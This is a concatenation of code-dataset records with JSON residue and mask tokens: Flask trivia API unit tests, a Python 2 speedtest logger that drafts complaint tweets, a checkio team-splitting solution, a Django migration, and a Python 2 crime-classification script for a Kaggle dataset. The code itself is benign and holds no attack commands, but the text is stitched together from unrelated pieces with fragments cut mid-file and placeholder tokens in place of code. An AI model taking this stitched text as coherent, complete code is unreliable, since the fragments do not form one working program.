test_search_questions_without_results(self):\n res = self.client().post('/questions/search', json={'search':\n 'Weird search'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['total_questions'], 0)\n self.assertEqual(len(data['questions']), 0)\n\n def test_search_questions_failure(self):\n res = self.client().post('/questions/search', json={'wrong_key':\n 'Van Gogh'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 400)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'bad request')\n\n def test_get_questions_by_category_if_success(self):\n res = self.client().get('/categories/1/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertEqual(data['current_category'], 1)\n\n def test_get_questions_by_category_if_failure(self):\n res = self.client().get('/categories/10000/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_quizz_question_if_success(self):\n res = self.client().post('/quizzes', json=self.quizz)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['question'])\n\n def test_get_quizz_question_if_bad_request(self):\n res = self.client().post('/quizzes/4', json=self.quizz)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n \"\"\"\n TODO\n Write at least one test for each test for successful\n operation and for expected errors.\n \"\"\"\n\n\n<mask token>\n",
"step-5": "import os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom flaskr import create_app\nfrom models import setup_db, Question\n\nDB_HOST = os.getenv('DB_HOST', '127.0.0.1:5432')\nDB_USER = os.getenv('DB_USER', 'postgres')\nDB_PASSWORD = os.getenv('DB_PASSWORD', 'postgres')\nDB_NAME = os.getenv('DB_NAME', 'trivia_test')\nDB_PATH = 'postgresql+psycopg2://{}:{}@{}/{}'.\\\n format(DB_USER, DB_PASSWORD, DB_HOST, DB_NAME)\n\n\nclass TriviaTestCase(unittest.TestCase):\n \"\"\"This class represents the trivia test case\"\"\"\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_path = DB_PATH\n setup_db(self.app, self.database_path)\n\n self.question_to_delete = Question(\n question='What?',\n answer='huh!',\n category=1,\n difficulty=1\n )\n\n self.new_question = {\n 'question': 'What?',\n 'answer': 'What',\n 'category': 1,\n 'difficulty': 1\n }\n\n self.quizz = {\n 'previous_questions': [1, 3],\n 'quiz_category': {'id': 1, 'type': 'Science'}\n }\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n\n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n def test_get_categories_if_success(self):\n res = self.client().get('/categories')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['categories'])\n\n def test_get_categories_if_non_existing_category(self):\n res = self.client().get('/categories/10000')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_questions_if_success(self):\n res = self.client().get('/questions')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertTrue(data['categories'])\n self.assertIsNone(data['current_category'])\n\n def test_get_questions_if_invalid_page(self):\n res = self.client().get('/questions?page=10000')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_delete_question_if_success(self):\n self.question_to_delete.insert()\n\n res = self.client().delete(f'/questions/{self.question_to_delete.id}')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['deleted_question'], self.question_to_delete.id)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n\n def test_delete_questions_if_non_existing_book(self):\n res = self.client().delete('/questions/100000')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'unprocessable')\n\n def test_create_question_if_success(self):\n res = self.client().post('/questions', json=self.new_question)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['created_question'])\n\n def test_create_question_if_bad_endpoint(self):\n res = self.client().post('/questions/45', 
json=self.new_question)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 405)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'method not allowed')\n\n def test_search_questions_with_results(self):\n res = self.client().post(\n '/questions/search', json={'search': 'Van Gogh'}\n )\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['total_questions'])\n self.assertEqual(len(data['questions']), 1)\n\n def test_search_questions_without_results(self):\n res = self.client().post(\n '/questions/search', json={'search': 'Weird search'}\n )\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['total_questions'], 0)\n self.assertEqual(len(data['questions']), 0)\n\n def test_search_questions_failure(self):\n res = self.client().post(\n '/questions/search', json={'wrong_key': 'Van Gogh'}\n )\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 400)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'bad request')\n\n def test_get_questions_by_category_if_success(self):\n res = self.client().get('/categories/1/questions')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertEqual(data['current_category'], 1)\n\n def test_get_questions_by_category_if_failure(self):\n res = self.client().get('/categories/10000/questions')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_quizz_question_if_success(self):\n res = self.client().post('/quizzes', json=self.quizz)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['question'])\n\n def test_get_quizz_question_if_bad_request(self):\n res = self.client().post('/quizzes/4', json=self.quizz)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n \"\"\"\n TODO\n Write at least one test for each test for successful\n operation and for expected errors.\n \"\"\"\n\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n unittest.main()\n",
"step-ids": [
15,
16,
18,
19,
23
]
}
|
[
15,
16,
18,
19,
23
] |
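The record above tests a Flask API through Flask's built-in test client. A minimal, self-contained sketch of that pattern follows, using a throwaway app rather than the trivia project's create_app factory (all routes and names below are illustrative, not taken from the record):

import json
import unittest

from flask import Flask, jsonify


def make_demo_app():
    # Stand-in for the project's create_app() application factory.
    app = Flask(__name__)

    @app.route('/ping')
    def ping():
        return jsonify({'success': True})

    return app


class DemoTestCase(unittest.TestCase):
    def setUp(self):
        self.client = make_demo_app().test_client

    def test_ping(self):
        res = self.client().get('/ping')
        data = json.loads(res.data)
        self.assertEqual(res.status_code, 200)
        self.assertEqual(data['success'], True)


if __name__ == '__main__':
    unittest.main()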
##
## Originally created by https://www.reddit.com/user/AlekseyP
## Seen at: https://www.reddit.com/r/technology/comments/43fi39/i_set_up_my_raspberry_pi_to_automatically_tweet
##
#!/usr/bin/python
import os
import sys
import csv
import datetime
import time
import twitter
#Configuration
# Twitter
ACCESS_TOKEN=""
ACCESS_TOKEN_SECRET=""
CONSUMER_KEY=""
CONSUMER_SECRET=""
# Minimum network speed
min_net_speed = 10
# Speedtest client absolute path
speedtest_path = "/home/alberto/Desarrollo/Proyectos/Scripts/SpeedTest/speedtest-cli"
csv_output_file_path = "/home/alberto/Desarrollo/Proyectos/Scripts/SpeedTest/"
def test():
#run speedtest-cli
print 'running test'
a = os.popen("python %s --simple"%(speedtest_path)).read()
print 'ran'
#split the 3 line result (ping,down,up)
lines = a.split('\n')
print a
ts = time.time()
date =datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
#if speedtest could not connect set the speeds to 0
if "Cannot" in a:
p = 100
d = 0
u = 0
#extract the values for ping down and up values
else:
p = lines[0][6:11]
d = lines[1][10:14]
u = lines[2][8:12]
print date,p, d, u
#save the data to file for local network plotting
out_file = open(csv_output_file_path + 'data.csv', 'a')
writer = csv.writer(out_file)
writer.writerow((ts*1000,p,d,u))
out_file.close()
my_auth = twitter.OAuth(ACCESS_TOKEN,ACCESS_TOKEN_SECRET,CONSUMER_KEY,CONSUMER_SECRET)
twit = twitter.Twitter(auth=my_auth)
#try to tweet if speedtest couldnt even connet. Probably wont work if the internet is down
if "Cannot" in a:
try:
tweet="Hey @Comcast @ComcastCares why is my internet down? I pay for 150down\\10up in Washington DC? #comcastoutage #comcast"
## twit.statuses.update(status=tweet)
print tweet
except:
pass
# tweet if down speed is less than whatever I set
elif eval(d)<min_net_speed:
print "trying to tweet"
try:
# i know there must be a better way than to do (str(int(eval())))
tweet="Hey @Comcast why is my internet speed " + str(int(eval(d))) + "down\\" + str(int(eval(u))) + "up when I pay for 150down\\10up in Washington DC? @ComcastCares @xfinity #comcast #speedtest"
## twit.statuses.update(status=tweet)
print tweet
except Exception,e:
print str(e)
pass
return
if __name__ == '__main__':
test()
print 'completed'
|
normal
|
{
"blob_id": "6492f1eda79fd3116058f29647dc5f09e903f637",
"index": 7274,
"step-1": "##\n## Originally created by https://www.reddit.com/user/AlekseyP\n## Seen at: https://www.reddit.com/r/technology/comments/43fi39/i_set_up_my_raspberry_pi_to_automatically_tweet\n##\n\n#!/usr/bin/python\nimport os\nimport sys\nimport csv\nimport datetime\nimport time\nimport twitter\n\n#Configuration\n# Twitter\nACCESS_TOKEN=\"\"\nACCESS_TOKEN_SECRET=\"\"\nCONSUMER_KEY=\"\"\nCONSUMER_SECRET=\"\"\n# Minimum network speed\nmin_net_speed = 10\n# Speedtest client absolute path\nspeedtest_path = \"/home/alberto/Desarrollo/Proyectos/Scripts/SpeedTest/speedtest-cli\"\ncsv_output_file_path = \"/home/alberto/Desarrollo/Proyectos/Scripts/SpeedTest/\"\n\ndef test():\n\n #run speedtest-cli\n print 'running test'\n a = os.popen(\"python %s --simple\"%(speedtest_path)).read()\n print 'ran'\n #split the 3 line result (ping,down,up)\n lines = a.split('\\n')\n print a\n ts = time.time()\n date =datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n #if speedtest could not connect set the speeds to 0\n if \"Cannot\" in a:\n p = 100\n d = 0\n u = 0\n #extract the values for ping down and up values\n else:\n p = lines[0][6:11]\n d = lines[1][10:14]\n u = lines[2][8:12]\n print date,p, d, u\n #save the data to file for local network plotting\n out_file = open(csv_output_file_path + 'data.csv', 'a')\n writer = csv.writer(out_file)\n writer.writerow((ts*1000,p,d,u))\n out_file.close()\n\n my_auth = twitter.OAuth(ACCESS_TOKEN,ACCESS_TOKEN_SECRET,CONSUMER_KEY,CONSUMER_SECRET)\n twit = twitter.Twitter(auth=my_auth)\n\n #try to tweet if speedtest couldnt even connet. Probably wont work if the internet is down\n if \"Cannot\" in a:\n try:\n tweet=\"Hey @Comcast @ComcastCares why is my internet down? I pay for 150down\\\\10up in Washington DC? #comcastoutage #comcast\"\n ## twit.statuses.update(status=tweet)\n\t\t\t print tweet\n except:\n pass\n\n # tweet if down speed is less than whatever I set\n elif eval(d)<min_net_speed:\n print \"trying to tweet\"\n try:\n # i know there must be a better way than to do (str(int(eval())))\n tweet=\"Hey @Comcast why is my internet speed \" + str(int(eval(d))) + \"down\\\\\" + str(int(eval(u))) + \"up when I pay for 150down\\\\10up in Washington DC? @ComcastCares @xfinity #comcast #speedtest\"\n ## twit.statuses.update(status=tweet)\n\t\t\t print tweet\n except Exception,e:\n print str(e)\n pass\n return\n\nif __name__ == '__main__':\n test()\n print 'completed'\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
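The script in this record is Python 2 and shells out to a local speedtest-cli checkout. A rough Python 3 sketch of the same measure-parse-log idea is given below; it assumes speedtest-cli is installed on PATH and prints the usual three-line --simple output, and it leaves the tweeting step out entirely:

import csv
import subprocess
import time

SPEEDTEST_CMD = ['speedtest-cli', '--simple']  # assumption: speedtest-cli is on PATH
CSV_PATH = 'data.csv'
MIN_DOWN_MBPS = 10.0


def run_speedtest():
    # --simple prints three lines: "Ping: x ms", "Download: y Mbit/s", "Upload: z Mbit/s"
    out = subprocess.run(SPEEDTEST_CMD, capture_output=True, text=True).stdout
    if 'Cannot' in out:
        return 100.0, 0.0, 0.0
    ping, down, up = (float(line.split()[1]) for line in out.splitlines()[:3])
    return ping, down, up


def log_result(ping, down, up):
    with open(CSV_PATH, 'a', newline='') as f:
        csv.writer(f).writerow((int(time.time() * 1000), ping, down, up))


if __name__ == '__main__':
    p, d, u = run_speedtest()
    log_result(p, d, u)
    if d < MIN_DOWN_MBPS:
        print(f'download speed {d:.1f} Mbit/s is below the {MIN_DOWN_MBPS} Mbit/s threshold')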
#Answer to The Ship Teams - https://py.checkio.org/en/mission/the-ship-teams/
def two_teams(sailors):
result = [] #To store the result
temp = [[],[]] #To store the intermediatary values
for i in sailors.items(): #To get the values of dictionary as Tuple
if i[1] > 40 or i[1] < 20: #To get the people to be added to the First Ship
temp[0].append(i[0]) #Adding each person name to first Temp List
else: #To get the people to be added to the Second Ship
temp[1].append(i[0]) #Adding each person name to second Temp List
result.append(sorted(temp[0])) #Adding all the names of the Ship 1 to resultant
result.append(sorted(temp[1])) #Adding all the names of the Ship 2 to resultant
return result #Return the result
if __name__ == '__main__':
print("Example:")
print(two_teams({'Smith': 34, 'Wesson': 22, 'Coleman': 45, 'Abrahams': 19}))
print(two_teams({'Fernandes': 18, 'Johnson': 22, 'Kale': 41, 'McCortney': 54}))
#These "asserts" using only for self-checking and not necessary for auto-testing
assert two_teams({
'Smith': 34,
'Wesson': 22,
'Coleman': 45,
'Abrahams': 19}) == [
['Abrahams', 'Coleman'],
['Smith', 'Wesson']
]
assert two_teams({
'Fernandes': 18,
'Johnson': 22,
'Kale': 41,
'McCortney': 54}) == [
['Fernandes', 'Kale', 'McCortney'],
['Johnson']
]
print("Coding complete? Click 'Check' to earn cool rewards!")
|
normal
|
{
"blob_id": "de634c95fddf4591cb15cd0eb20e798043075798",
"index": 2464,
"step-1": "<mask token>\n",
"step-2": "def two_teams(sailors):\n result = []\n temp = [[], []]\n for i in sailors.items():\n if i[1] > 40 or i[1] < 20:\n temp[0].append(i[0])\n else:\n temp[1].append(i[0])\n result.append(sorted(temp[0]))\n result.append(sorted(temp[1]))\n return result\n\n\n<mask token>\n",
"step-3": "def two_teams(sailors):\n result = []\n temp = [[], []]\n for i in sailors.items():\n if i[1] > 40 or i[1] < 20:\n temp[0].append(i[0])\n else:\n temp[1].append(i[0])\n result.append(sorted(temp[0]))\n result.append(sorted(temp[1]))\n return result\n\n\nif __name__ == '__main__':\n print('Example:')\n print(two_teams({'Smith': 34, 'Wesson': 22, 'Coleman': 45, 'Abrahams': 19})\n )\n print(two_teams({'Fernandes': 18, 'Johnson': 22, 'Kale': 41,\n 'McCortney': 54}))\n assert two_teams({'Smith': 34, 'Wesson': 22, 'Coleman': 45, 'Abrahams': 19}\n ) == [['Abrahams', 'Coleman'], ['Smith', 'Wesson']]\n assert two_teams({'Fernandes': 18, 'Johnson': 22, 'Kale': 41,\n 'McCortney': 54}) == [['Fernandes', 'Kale', 'McCortney'], ['Johnson']]\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")\n",
"step-4": "#Answer to The Ship Teams - https://py.checkio.org/en/mission/the-ship-teams/\n\ndef two_teams(sailors):\n result = [] #To store the result\n temp = [[],[]] #To store the intermediatary values\n for i in sailors.items(): #To get the values of dictionary as Tuple\n if i[1] > 40 or i[1] < 20: #To get the people to be added to the First Ship\n temp[0].append(i[0]) #Adding each person name to first Temp List\n else: #To get the people to be added to the Second Ship\n temp[1].append(i[0]) #Adding each person name to second Temp List\n result.append(sorted(temp[0])) #Adding all the names of the Ship 1 to resultant\n result.append(sorted(temp[1])) #Adding all the names of the Ship 2 to resultant\n return result #Return the result\n\nif __name__ == '__main__':\n print(\"Example:\")\n print(two_teams({'Smith': 34, 'Wesson': 22, 'Coleman': 45, 'Abrahams': 19}))\n print(two_teams({'Fernandes': 18, 'Johnson': 22, 'Kale': 41, 'McCortney': 54}))\n\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert two_teams({\n 'Smith': 34, \n 'Wesson': 22, \n 'Coleman': 45, \n 'Abrahams': 19}) == [\n ['Abrahams', 'Coleman'], \n ['Smith', 'Wesson']\n ]\n\n assert two_teams({\n 'Fernandes': 18,\n 'Johnson': 22,\n 'Kale': 41,\n 'McCortney': 54}) == [\n ['Fernandes', 'Kale', 'McCortney'], \n ['Johnson']\n ]\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
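For comparison, the grouping done by two_teams in this record can also be written with two comprehensions; this is only an equivalent sketch, not part of the checkio answer:

def two_teams_compact(sailors):
    # First ship: younger than 20 or older than 40; second ship: everyone else. Names sorted.
    first = sorted(name for name, age in sailors.items() if age < 20 or age > 40)
    second = sorted(name for name, age in sailors.items() if 20 <= age <= 40)
    return [first, second]


assert two_teams_compact({'Smith': 34, 'Wesson': 22, 'Coleman': 45, 'Abrahams': 19}) == [
    ['Abrahams', 'Coleman'], ['Smith', 'Wesson']]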
# Generated by Django 2.2 on 2020-10-26 15:16
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('viajes', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='viajes',
options={'verbose_name': 'Movilización', 'verbose_name_plural': 'Movilización'},
),
]
|
normal
|
{
"blob_id": "760a5a168575a0ea12b93cb58c1e81e313704e35",
"index": 6276,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('viajes', '0001_initial')]\n operations = [migrations.AlterModelOptions(name='viajes', options={\n 'verbose_name': 'Movilización', 'verbose_name_plural': 'Movilización'})\n ]\n",
"step-4": "from django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('viajes', '0001_initial')]\n operations = [migrations.AlterModelOptions(name='viajes', options={\n 'verbose_name': 'Movilización', 'verbose_name_plural': 'Movilización'})\n ]\n",
"step-5": "# Generated by Django 2.2 on 2020-10-26 15:16\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('viajes', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='viajes',\n options={'verbose_name': 'Movilización', 'verbose_name_plural': 'Movilización'},\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
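The AlterModelOptions operation in this migration mirrors a change to the model's Meta class. A hypothetical sketch of the corresponding model definition (the field is invented for illustration; the real model's fields are not shown in the record):

from django.db import models


class Viajes(models.Model):
    # Illustrative field only.
    destino = models.CharField(max_length=100)

    class Meta:
        verbose_name = 'Movilización'
        verbose_name_plural = 'Movilización'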
import pandas as pd
import time
from datetime import datetime
from sklearn import metrics
from sklearn import cross_validation
from sklearn.multiclass import OneVsRestClassifier
from sklearn.tree import DecisionTreeClassifier, export_graphviz
from sklearn.naive_bayes import MultinomialNB,BernoulliNB,GaussianNB
from sklearn.cross_validation import StratifiedKFold
from sklearn.svm import SVC, LinearSVC
import gzip
def getData():
print "reading file ..."
data=pd.read_csv('../train.csv')
test=pd.read_csv('../test.csv')
return data,test
def preprocessTest(trainDF):
print "pre processing data ..."
start=time.time()
return trainDF
def decisionTree(trainDF,y,xHat):
start=time.time()
print "#"*70
print "Using Decision Tree Classifier"
print "#"*70
trainingVectors=trainDF.as_matrix()
# clf=DecisionTreeClassifier(criterion="entropy")
clf = MultinomialNB()
print "training classifier ..."
clf.fit(trainDF,y)
print "predicting classes for test data"
# xHat.drop(['Id'])
yHat=clf.predict_proba(xHat)
print"yhat"
print yHat[0]
end=time.time()
print "Execution time for classifier: "+str(end-start)
print "#"*70
return yHat,clf
def daytime(x):
# eMorning=0
# morning=0
# afternoon=0
# evening=0
# night=0
a=0
b=0
c=0
d=0
e=0
f=0
# if (x in [4,5,6,7]):
# eMorning=1
# if (x in [8,9,10,11]):
# morning=1
# if (x in [12,13,14,15,16]):
# afternoon=1
# if (x in [17,18,19,20,21,22,23,0,1,2,3]):
# night=1
if (x in [4,5,6,7]):
a=1
if (x in [8,9,10,11]):
b=1
if (x in [12,13,14,15]):
c=1
if (x in [16,17,18,19]):
d=1
if (x in [20,21,22,23]):
e=1
if (x in [0,1,2,3]):
f=1
return a,b,c,d,e,f
def splitDate(x):
dateObject=datetime.strptime(x,"%Y-%m-%d %H:%M:%S")
time=dateObject.hour
day=dateObject.day
month=dateObject.month
year=dateObject.year
return time,day,month,year
def preprocessData(trainDF):
print "pre processing data ..."
start=time.time()
cols=trainDF.columns.values.tolist()
if ('Category'in cols):
trainDF=trainDF.drop(['Category','Descript','Resolution'],axis=1)
df=pd.DataFrame()
print"seperating districts"
df=pd.get_dummies(trainDF['PdDistrict'],prefix='pD')
trainDF=pd.concat([trainDF,df],axis=1)
df=pd.DataFrame()
print "seperating days of week"
df=pd.get_dummies(trainDF['DayOfWeek'],prefix='day')
trainDF=pd.concat([trainDF,df],axis=1)
print "seperating time"
trainDF["time"],trainDF["day"],trainDF["month"],trainDF["year"]=zip(*trainDF["Dates"].apply(splitDate))
print "getting part of day"
trainDF["a"],trainDF["b"],trainDF["c"],trainDF["d"],trainDF["e"],trainDF["f"]=zip(*trainDF["time"].apply(daytime))
print"generating extra feature Awake"
# trainDF["summer"],trainDF["fall"],trainDF["winter"],trainDF["spring"]=zip(*trainDF["month"].apply(getSeason))
print"generating extra feature Awake"
trainDF["Awake"]=trainDF["time"].apply(lambda x: 1 if (x==0 or (x>=8 and x<=23)) else 0)
print"generating extra feature intersection"
trainDF['intersection']=trainDF['Address'].apply(lambda x: 1 if "/" in x else 0)
print "descretizing X"
xcol={}
trainDF.X=pd.cut(trainDF.X,60)
temp=sorted(trainDF.X.unique())
for i in temp:
xcol[i]=temp.index(i)
trainDF.X=trainDF.X.map(xcol)
df=pd.DataFrame()
df=pd.get_dummies(trainDF['X'],prefix='X')
trainDF=pd.concat([trainDF,df],axis=1)
print "descretizing Y"
ycol={}
trainDF.Y=pd.cut(trainDF.Y,100)
temp=sorted(trainDF.Y.unique())
for i in temp:
ycol[i]=temp.index(i)
trainDF.Y=trainDF.Y.map(ycol)
df=pd.DataFrame()
df=pd.get_dummies(trainDF['Y'],prefix='Y')
trainDF=pd.concat([trainDF,df],axis=1)
print"dropping unnecessary values"
trainDF=trainDF.drop(['DayOfWeek','PdDistrict','Address','time','day','year','month','Dates','X','Y'],axis=1)
print trainDF.head()
end=time.time()
return trainDF
def main():
trainDF,testDF=getData()
y=trainDF.Category.values
idList=testDF.Id.tolist()
testDF=testDF.drop(['Id'],axis=1)
trainDF=preprocessData(trainDF)
testDF=preprocessData(testDF)
predicted,clf=decisionTree(trainDF,y,testDF)
submission = pd.DataFrame(predicted,columns=clf.classes_)
submission['Id']=idList
cols=submission.columns.tolist()
cols=cols[-1:]+cols[:-1]
submission=submission[cols]
print submission.head()
submission.to_csv(open('RF.csv','wt'),index=False)
print "submission file created"
return
if __name__=="__main__":
main()
|
normal
|
{
"blob_id": "78615f6b020e2547e5d9a08d8b4c414184106bb3",
"index": 6465,
"step-1": "import pandas as pd\r\nimport time\r\nfrom datetime import datetime\r\nfrom sklearn import metrics\r\nfrom sklearn import cross_validation\r\nfrom sklearn.multiclass import OneVsRestClassifier\r\nfrom sklearn.tree import DecisionTreeClassifier, export_graphviz\r\nfrom sklearn.naive_bayes import MultinomialNB,BernoulliNB,GaussianNB\r\nfrom sklearn.cross_validation import StratifiedKFold\r\nfrom sklearn.svm import SVC, LinearSVC\r\nimport gzip\r\n\r\ndef getData():\r\n print \"reading file ...\"\r\n data=pd.read_csv('../train.csv')\r\n test=pd.read_csv('../test.csv')\r\n return data,test\r\n\r\ndef preprocessTest(trainDF):\r\n\tprint \"pre processing data ...\"\r\n \tstart=time.time()\r\n\treturn trainDF\r\n\r\ndef decisionTree(trainDF,y,xHat):\r\n start=time.time()\r\n print \"#\"*70\r\n print \"Using Decision Tree Classifier\"\r\n print \"#\"*70\r\n trainingVectors=trainDF.as_matrix()\r\n # clf=DecisionTreeClassifier(criterion=\"entropy\")\r\n clf = MultinomialNB()\r\n print \"training classifier ...\"\r\n clf.fit(trainDF,y)\r\n print \"predicting classes for test data\"\r\n # xHat.drop(['Id'])\r\n yHat=clf.predict_proba(xHat)\r\n print\"yhat\"\r\n print yHat[0]\r\n end=time.time()\r\n print \"Execution time for classifier: \"+str(end-start)\r\n print \"#\"*70\r\n return yHat,clf\r\n\r\n\r\ndef daytime(x):\r\n # eMorning=0\r\n # morning=0\r\n # afternoon=0\r\n # evening=0\r\n # night=0\r\n a=0\r\n b=0\r\n c=0\r\n d=0\r\n e=0\r\n f=0\r\n # if (x in [4,5,6,7]):\r\n # eMorning=1\r\n # if (x in [8,9,10,11]):\r\n # morning=1\r\n # if (x in [12,13,14,15,16]):\r\n # afternoon=1\r\n # if (x in [17,18,19,20,21,22,23,0,1,2,3]):\r\n # night=1\r\n if (x in [4,5,6,7]):\r\n a=1\r\n if (x in [8,9,10,11]):\r\n b=1\r\n if (x in [12,13,14,15]):\r\n c=1\r\n if (x in [16,17,18,19]):\r\n d=1\r\n if (x in [20,21,22,23]):\r\n e=1\r\n if (x in [0,1,2,3]):\r\n f=1\r\n return a,b,c,d,e,f\r\n\r\ndef splitDate(x):\r\n dateObject=datetime.strptime(x,\"%Y-%m-%d %H:%M:%S\")\r\n time=dateObject.hour\r\n day=dateObject.day\r\n month=dateObject.month\r\n year=dateObject.year\r\n return time,day,month,year\r\n\r\ndef preprocessData(trainDF):\r\n print \"pre processing data ...\"\r\n start=time.time()\r\n cols=trainDF.columns.values.tolist()\r\n if ('Category'in cols):\r\n \ttrainDF=trainDF.drop(['Category','Descript','Resolution'],axis=1)\r\n df=pd.DataFrame()\r\n print\"seperating districts\"\r\n df=pd.get_dummies(trainDF['PdDistrict'],prefix='pD')\r\n trainDF=pd.concat([trainDF,df],axis=1)\r\n df=pd.DataFrame()\r\n print \"seperating days of week\"\r\n df=pd.get_dummies(trainDF['DayOfWeek'],prefix='day')\r\n trainDF=pd.concat([trainDF,df],axis=1)\r\n print \"seperating time\"\r\n trainDF[\"time\"],trainDF[\"day\"],trainDF[\"month\"],trainDF[\"year\"]=zip(*trainDF[\"Dates\"].apply(splitDate))\r\n print \"getting part of day\"\r\n trainDF[\"a\"],trainDF[\"b\"],trainDF[\"c\"],trainDF[\"d\"],trainDF[\"e\"],trainDF[\"f\"]=zip(*trainDF[\"time\"].apply(daytime))\r\n print\"generating extra feature Awake\"\r\n # trainDF[\"summer\"],trainDF[\"fall\"],trainDF[\"winter\"],trainDF[\"spring\"]=zip(*trainDF[\"month\"].apply(getSeason))\r\n print\"generating extra feature Awake\"\r\n trainDF[\"Awake\"]=trainDF[\"time\"].apply(lambda x: 1 if (x==0 or (x>=8 and x<=23)) else 0)\r\n print\"generating extra feature intersection\"\r\n trainDF['intersection']=trainDF['Address'].apply(lambda x: 1 if \"/\" in x else 0)\r\n\r\n print \"descretizing X\"\r\n xcol={}\r\n trainDF.X=pd.cut(trainDF.X,60)\r\n 
temp=sorted(trainDF.X.unique())\r\n for i in temp:\r\n xcol[i]=temp.index(i)\r\n trainDF.X=trainDF.X.map(xcol)\r\n df=pd.DataFrame()\r\n df=pd.get_dummies(trainDF['X'],prefix='X')\r\n trainDF=pd.concat([trainDF,df],axis=1)\r\n\r\n print \"descretizing Y\"\r\n ycol={}\r\n trainDF.Y=pd.cut(trainDF.Y,100)\r\n temp=sorted(trainDF.Y.unique())\r\n for i in temp:\r\n ycol[i]=temp.index(i)\r\n trainDF.Y=trainDF.Y.map(ycol)\r\n df=pd.DataFrame()\r\n df=pd.get_dummies(trainDF['Y'],prefix='Y')\r\n trainDF=pd.concat([trainDF,df],axis=1)\r\n\r\n print\"dropping unnecessary values\"\r\n trainDF=trainDF.drop(['DayOfWeek','PdDistrict','Address','time','day','year','month','Dates','X','Y'],axis=1)\r\n print trainDF.head()\r\n end=time.time()\r\n return trainDF\r\n\r\ndef main():\r\n trainDF,testDF=getData()\r\n y=trainDF.Category.values\r\n idList=testDF.Id.tolist()\r\n testDF=testDF.drop(['Id'],axis=1)\r\n trainDF=preprocessData(trainDF)\r\n testDF=preprocessData(testDF)\r\n predicted,clf=decisionTree(trainDF,y,testDF)\r\n submission = pd.DataFrame(predicted,columns=clf.classes_)\r\n submission['Id']=idList\r\n cols=submission.columns.tolist()\r\n cols=cols[-1:]+cols[:-1]\r\n submission=submission[cols]\r\n print submission.head()\r\n submission.to_csv(open('RF.csv','wt'),index=False)\r\n print \"submission file created\"\r\n return\r\n\r\n\r\nif __name__==\"__main__\":\r\n main()",
"step-2": null,
"step-3": null,
